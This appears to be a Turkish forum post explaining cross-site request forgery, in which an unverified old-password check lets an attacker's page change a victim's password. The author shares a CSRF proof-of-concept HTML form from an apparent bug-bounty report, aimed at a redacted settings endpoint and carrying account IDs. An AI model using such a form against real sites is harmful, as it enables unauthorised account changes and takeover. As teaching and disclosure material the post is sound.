Açığın nerede olduğu önemli, örneğin şifre değiştirme bölümündeyse ve şifre değiştirirken eski şifreyi kontrol etmiyorsanız, adam kendi sitesi üzerinde bir html dosyası oluşturur
action= acıklı adres
value="yenisifre"
gibi daha sonra siz buna authken tıklarsanız adam sizin şifrenizi değiştirebilir.

Otomatize toollar kullanarak tarıyorsanız çok alakasız yerlerde CSRF alabilirsiniz örneğin search parametresinde csrf verir tek yapabileceği şey size sitede kelime arattırmak olur.


Daha önce hackerone üzerindeki bir programda bulduğum bir csrf için hazırladığım HTML şablonu atayım buraya belki çalışma mantığını anlarsınız.


<html><form enctype="application/x-www-form-urlencoded" method="POST" action="https://www.xxx.com/settings/xxx/save/"><br>
<tr><td>hesap id</td><td><input type="text" value="10000577xxx" name="id"></td></tr><br>
<tr><td>yetkilendirilecek id</td><td><input type="text" value="100000704xxx" name="__user"></td></tr><br>
</table><input type="submit" value="Gonder"></form><br></html>
Gizlilik kapsamından dolayı siteyle ilgili bir kısım veriler gizlenmiştir.